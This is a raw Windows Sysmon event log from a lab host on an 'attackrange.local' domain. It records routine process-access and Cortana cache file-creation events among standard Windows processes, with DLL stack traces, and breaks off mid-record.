12:02:31.056{266CAFBE-64C4-6064-9C00-00000000AE01}46204872C:\Windows\system32\sihost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\twinui.appcore.dll+684b|C:\Windows\System32\twinui.appcore.dll+564d|C:\Windows\System32\twinui.appcore.dll+4d5e|C:\Windows\system32\activationmanager.dll+8469|C:\Windows\system32\activationmanager.dll+b6c7|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000006705Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.056{266CAFBE-64C4-6064-9B00-00000000AE01}49246000C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\execmodelclient.dll+8e62|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x80000000000000006704Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.056{266CAFBE-64C4-6064-9B00-00000000AE01}49246000C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\execmodelclient.dll+8d5e|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x80000000000000006703Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.056{266CAFBE-64C5-6064-A500-00000000AE01}43565368C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109196|C:\Windows\System32\TwinUI.dll+82af7|C:\Windows\System32\TwinUI.dll+182ce3|C:\Windows\SYSTEM32\ntdll.dll+80974|C:\Windows\SYSTEM32\ntdll.dll+1e892|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006702Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.056{266CAFBE-64C5-6064-A500-00000000AE01}43565368C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109196|C:\Windows\System32\TwinUI.dll+82af7|C:\Windows\System32\TwinUI.dll+182ce3|C:\Windows\SYSTEM32\ntdll.dll+80974|C:\Windows\SYSTEM32\ntdll.dll+1e892|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006701Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.056{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba300|C:\Windows\System32\TwinUI.dll+ba677|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x80000000000000006700Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.056{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba300|C:\Windows\System32\TwinUI.dll+ba677|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x80000000000000006699Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.041{266CAFBE-64C4-6064-9E00-00000000AE01}31204072C:\Windows\system32\taskhostw.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006698Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.041{266CAFBE-646C-6064-1200-00000000AE01}11961192C:\Windows\system32\svchost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6c14|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+1a697|c:\windows\system32\fntcache.dll+1aacc|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006697Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.041{266CAFBE-646C-6064-1200-00000000AE01}11961192C:\Windows\system32\svchost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6c14|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+1a697|c:\windows\system32\fntcache.dll+1aacc|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 11241100x80000000000000006696Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.025{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_17[1].txt2021-03-31 12:02:31.010 23542300x80000000000000006695Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.025{266CAFBE-64D4-6064-B700-00000000AE01}5704ATTACKRANGE\AdministratorC:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_17[1].txtMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000006694Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.025{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_17[1].txt2021-03-31 12:02:31.010 11241100x80000000000000006693Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.010{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_16[1].txt2021-03-31 12:02:31.010 23542300x80000000000000006692Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.010{266CAFBE-64D4-6064-B700-00000000AE01}5704ATTACKRANGE\AdministratorC:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_16[1].txtMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000006691Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.010{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_16[1].txt2021-03-31 12:02:31.010 11241100x80000000000000006690Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.010{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_15[1].txt2021-03-31 12:02:31.010 23542300x80000000000000006689Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.010{266CAFBE-64D4-6064-B700-00000000AE01}5704ATTACKRANGE\AdministratorC:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_15[1].txtMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000006688Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.010{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_15[1].txt2021-03-31 12:02:31.010 11241100x80000000000000006687Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.010{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_14[1].txt2021-03-31 12:02:31.010 23542300x80000000000000006686Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.010{266CAFBE-64D4-6064-B700-00000000AE01}5704ATTACKRANGE\AdministratorC:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_14[1].txtMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000006685Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.010{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_14[1].txt2021-03-31 12:02:31.010 11241100x80000000000000006684Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.010{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_13[1].txt2021-03-31 12:02:31.010 23542300x80000000000000006683Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.010{266CAFBE-64D4-6064-B700-00000000AE01}5704ATTACKRANGE\AdministratorC:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_13[1].txtMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000006682Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.010{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_13[1].txt2021-03-31 12:02:31.010 11241100x80000000000000006681Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.994{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_12[1].txt2021-03-31 12:02:30.994 23542300x80000000000000006680Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.994{266CAFBE-64D4-6064-B700-00000000AE01}5704ATTACKRANGE\AdministratorC:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_12[1].txtMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000006679Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.994{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_12[1].txt2021-03-31 12:02:30.994 11241100x80000000000000006678Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.994{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_11[1].txt2021-03-31 12:02:30.994 23542300x80000000000000006677Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.994{266CAFBE-64D4-6064-B700-00000000AE01}5704ATTACKRANGE\AdministratorC:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_11[1].txtMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000007406Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:32.801{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+739b|C:\Windows\SYSTEM32\psmserviceexthost.dll+ae34|C:\Windows\SYSTEM32\psmserviceexthost.dll+7bae|C:\Windows\SYSTEM32\psmserviceexthost.dll+12111|C:\Windows\SYSTEM32\psmserviceexthost.dll+170a8|C:\Windows\SYSTEM32\resourcepolicyserver.dll+12326|C:\Windows\SYSTEM32\resourcepolicyserver.dll+bac5|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007405Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:32.801{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\System32\TwinUI.dll+acea6|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007404Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:32.801{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\System32\TwinUI.dll+acea6|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007403Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:32.801{266CAFBE-647D-6064-3300-00000000AE01}25204828C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\tileobjserver.dll+bce2|c:\windows\system32\tileobjserver.dll+26da2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x80000000000000007402Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 